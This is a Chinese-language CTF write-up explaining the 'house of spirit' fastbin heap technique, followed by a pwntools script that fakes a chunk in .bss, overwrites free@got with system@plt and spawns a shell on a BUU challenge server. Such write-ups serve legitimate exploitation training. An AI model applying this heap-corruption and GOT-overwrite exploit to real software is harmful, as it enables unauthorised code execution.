打算学 house of spirit,然后发现 house of spirit 其实在学 fastbin attack 时就学过了,只是不知道这个 trick 有这个名字,中途找到了这个题,来都来了就做了一下。
House of spirit
其实就是通过在目标地址伪造 fake chunk,然后通过 free 或者劫持 fd 指针的形式把 fake chunk 放到 bin 中,然后从 bin 中把 fake chunk 给拿出来,以此实现控制目标地址的效果。
sol
这题 buu 的环境上没法利用后门函数,所以需要自己 getshell
没开 pie,Partial RELRO,于是考虑覆盖 free@got 为 system@plt,尝试直接在 free@got 处伪造 fake chunk,发现没法错位构造纯净的 size 域,不过程序存在 heaparray 在 .bss 段,用于存储 chunk 地址。首先想到可以用 unlink 劫持 heaparray,不过 heaparray 头上有 stdin,这是指向 FILE 结构体的指针,在 libc 段,后面又有一个为 0 的变量,可以错位构造一个 size = 0x70,直接在 .bss 段上伪造 fake chunk,劫持 heaparray,然后写入 free@got 的地址,再利用 edit 函数修改 free@got,最终 free 一个写入 /bin/sh\x00 的 chunk 即可。
from pwn import *
#io = process('./pwn')
io = remote('node5.buuoj.cn',26581)
elf = ELF('./pwn')
def create(size,content):io.sendafter(b'Your choice :',b'1')io.sendafter(b'Size of Heap : ',str(size).encode())io.sendafter(b'Content of heap:',content)io.recvuntil(b'SuccessFul')
def edit(index,size,content):io.sendafter(b'Your choice :',b'2')io.sendafter(b'Index :',str(index).encode())io.sendafter(b'Size of Heap : ',str(size).encode())io.sendafter(b'Content of heap : ',content)io.recvuntil(b'Done !')
def delete(index):io.sendafter(b'Your choice :',b'3')io.sendafter(b'Index :',str(index).encode())io.recvuntil(b'Done !')
def Exploit():create(0x60,b'id=0')create(0x60,b'id=1')create(0x20,b'/bin/sh\x00') # id=2fake_chunk = 0x6020b0-3print(1)delete(1)payload = b'a'*0x60+p64(0x70)+p64(0x71)+p64(fake_chunk)edit(0,len(payload),payload)create(0x60,b'id=1')free_got = elf.got['free'];system_plt = elf.plt['system']create(0x60,b'\x00'*(0x6020E0-fake_chunk-0x10)+p64(free_got)) # id = 3edit(0,8,p64(system_plt))#delete(2)io.interactive()if __name__ == '__main__':Exploit()